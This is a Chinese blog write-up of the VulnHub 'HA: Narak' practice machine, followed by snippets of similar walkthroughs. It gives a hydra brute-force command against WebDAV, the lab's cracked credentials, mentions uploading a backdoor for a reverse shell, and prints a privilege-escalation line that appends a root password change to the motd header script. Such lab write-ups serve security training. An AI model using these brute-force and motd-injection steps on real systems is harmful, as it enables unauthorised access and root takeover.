[Vulnhub] Narak

已于 2022-05-04 13:12:33 修改
阅读量2k 收藏
点赞数
分类专栏: vulnhub 文章标签: web安全 linux
于 2022-05-04 00:04:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46739058/article/details/124562530
版权

vulnhub靶场地址:HA: Narak ~ VulnHub

使用迅雷下载会快点

参考B站视频:玩转100个vulnhub靶场2----narak_哔哩哔哩_bilibili

和之前一样,主机发现,端口扫描,打开目标网页

网页和源代码寻个遍也没有明显有用的信息,那就后台路径扫描

webdav是web上的一个服务,kali自带的cadaver能够连接webdav,但是不知道账号密码

 通过kali自带的cewl提取网站关键字作为字典,随后使用hydra爆破

cewl 192.168.56.138 -w 1.txt

hydra -L 1.txt -P 1.txt 192.168.56.138 hhtp-get /webdav

得到账号:yamdoot,密码:Swarg。连接目标网站的webdav服务,并使用put命令上传后门

执行木马前,先监听本地端口

 反弹成功,使用 python3 -c 'import pty;pty.spawn("/bin/bash");' 命令来构造交互式shell,继续进行信息搜集

在下面这个网站进行解码Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]https://www.splitbrain.org/services/ook 

 得到一串密码,不知道是哪个用户的,一个一个用SSH尝试连接,测出是inferno用户的

 

 拿下第一个flag。这里利用motd提权

这里利用motd提权

修改文件 /etc/update-motd.d/00-header

1.进入到文件夹 /etc/update-motd.d/

2.修改文件 echo "echo 'root:admin'|sudo chpasswd">>00-header

3.重新登录

4. 切换管理员

重新登录,切换为root

  

Dues_D
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机:narak
weixin_50339323的博客
08-04 1582
靶机网址:https://www.vulnhub.com/entry/ha-narak,569/ 目录 一、信息搜集: 二、漏洞利用与探测: 三、提权 一、信息搜集: 获取IP: nmap -sP 192.168.8.0/24 端口扫描: nmap -sV -p- -sC 192.168.8.132 -n -vv 22、80端口均开启 访问192.168.8.132 从页面搜索信息 · 翻译了一下网页内容信息提取关键字或许有用: yamdoot,...
VulnHub narak
weixin_45682839的博客
10-21 1119
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
[Vulnhub] narak
weixin_63231007的博客
06-28 344
靶机下载链接:HA: Narak ~ VulnHub由于靶机和kali在同一网段,打开kali,通过nmap进行主机发现kali:192.168.236.128 靶机ip为:192.168.236.131 访问试试 只得到一堆图片,没有可用信息, webdav是web上的一个服务,kali自带的cadaver能够连接webdav 但是我们不知道账号密码,下又要用到我们的cewl工具 执行后得到了 1.txt文件。有了密码字典后,对其进行爆破,又用到了Hydra爆破神器 得到了用户名:yamdoot 密码:
[VulnHub靶机渗透] HA: Narak
人若无名,便可专心练剑
02-22 1486
学渗透必打百台靶机实操精讲-Narak。涉及UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限。相比之前的视频,增加了些新知识,值得玩味的攻击链。可以结合靶机实操。
Vulnhub靶机实战-NARAK
黑白的博客
01-18 993
声明 好好学习,天天向上 搭建 用vmware打开,都调成NAT或者都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.52 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.31.52 看了首页,看见了地狱一样,不禁让我想起了最近的电视剧《风声》里面的地狱变 扫目录吧 python3 dirsearch.py -u 192.168.31.52 开的目录不是很多 使用
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
Google搜索引擎算法的秘密
05-18
在IT行业中,搜索引擎优化(SEO)是至关重要的领域,尤其是对于Google搜索引擎,它的算法秘密一直是业界探讨的焦点。Google作为全球最广泛使用的搜索引擎,其强大的搜索能力得益于不断更新和优化的算法。...
Goruntu-Isleme
02-21
Bu komşuların sınıfları sayısının toplamı alınarak, en sık görülen sınıf o noktanın sınıflandırması olarak seçilir. **Jupyter Notebook Kullanımı** Jupyter Notebook, bilimsel ...
vulnhubnarak
weixin_54431413的博客
06-26 402
web端入手,cewl进行定制字典,hydra对webdav进行爆破,davtest上传php反弹shell,unbuntu内核漏洞提权,查找相关文件命令(-perm),motd注入更改root密码,
VulnHub靶场之HA: NARAK
A_dmin的博客
10-01 1649
VulnHub靶场之HA: NARAK 一开始扫描存活主机ip: 执行命令:nmap -sV -p 1-65535 192.168.198.148 先查看80端口,是一个网页: 目录扫描: 发现存在一个401的登陆页面,利用cewl生成字典: 利用hydra对其进行爆破,hydra -L woldlist.txt -P woldlist.txt 192.168.198.148 http-get /webdav 得到账号密码yamdoot:Swarg: 成功进入: 后面没有思路了,,,emmmm
VulnHub靶场HA: NARAK练习 - 修改00-header文件进行提权
qq_43232893的博客
10-15 614
VulnHub靶场HA: NARAK练习简介开始 简介 攻击机ip:192.168.255.139 靶机ip: 192.168.255.142 靶机下载地址: 开始 使用nmap找到靶机地址并扫描端口 找到靶机ip,使用nmap -sV -Pn -p- -v 192.168.255.142进行端口扫描 发现开启了个80跟22端口,访问一下80端口: 什么都没有,再看看有没有敏感目录 发现了一个401登录界面 利用cewl生成字典 cewl 192.168.255.142 -w 1.txt 再使
Vulnhub-Narak靶场
Longwaer
12-29 882
VulnhubNarak靶场学习,通过笔记全方位细致演示,更快的掌握漏洞复现、各种小技巧等。
vulnhub-nark靶机渗透
晴的博客
03-19 4963
1.主机发现 2.端口扫描: 3.访问80端口: 4.dirb基于字典的目录扫描工具 发现了三个目录 5.发现webdav服务,需要cadaver工具连接,连接之后可以上传。用cadaver在网站webdav对应目录下建立连接,类似ftp,之后上传webshell,通过浏览器访问木马地址连接到本地 6.用cewl工具通过爬取网站信息的关键字来生成字典,通过生成的字典进行爆破 7.生成字典内容如下(部分内容) 8.用hydra爆破工具爆破 -L指定用户名 -P指.
Vulnhub系列之DC6靶场详解
weixin_50053818的博客
05-27 1108
文章目录环境爆破拿后台密码 环境 vulhub系列之DC6靶场 VMware虚拟机 kali 爆破拿后台密码 根据目标靶机MAC地址得到目标IP:192.168.43.60,直接上nmap扫描。 开启了22和80两个端口号,并且需要指定域名解析才可以访问网页,直接在`/etc/hosts`下写入`192.168.43.60 wordy`即可。 进入网站可以知道CMS为wordpress 5.1.1,直接wpscan扫描。 扫描出5个用户,把五个用户写入user
靶场练习第三天~vulnhub靶场之narak
qq_57976347的博客
01-28 947
靶机下载链接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5 一、信息收集 1.使用namp 192.168.101.0/24扫描该网段的地址,寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描,dirb目录扫描工具(kali自带的),使用命令dirb http://192.168.101.102,扫描后发现有3个网址,发现有webdav网址 二、利用webdav客户端,思路:cadav..
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4671
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
vulnhub靶机-DC6-Writeup
liuhanzhe的专栏
12-08 335
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-6,315/ DESCRIPTION DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for be
VulnHub-narak
qq_48511129的博客
09-05 138
网络安全-网络安全及其防护措施8
最新发布
LS_Ai的博客
07-17 1075
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
等保测评助力网络安全治理现代化
waitaikong_的博客
07-14 372
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dues_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值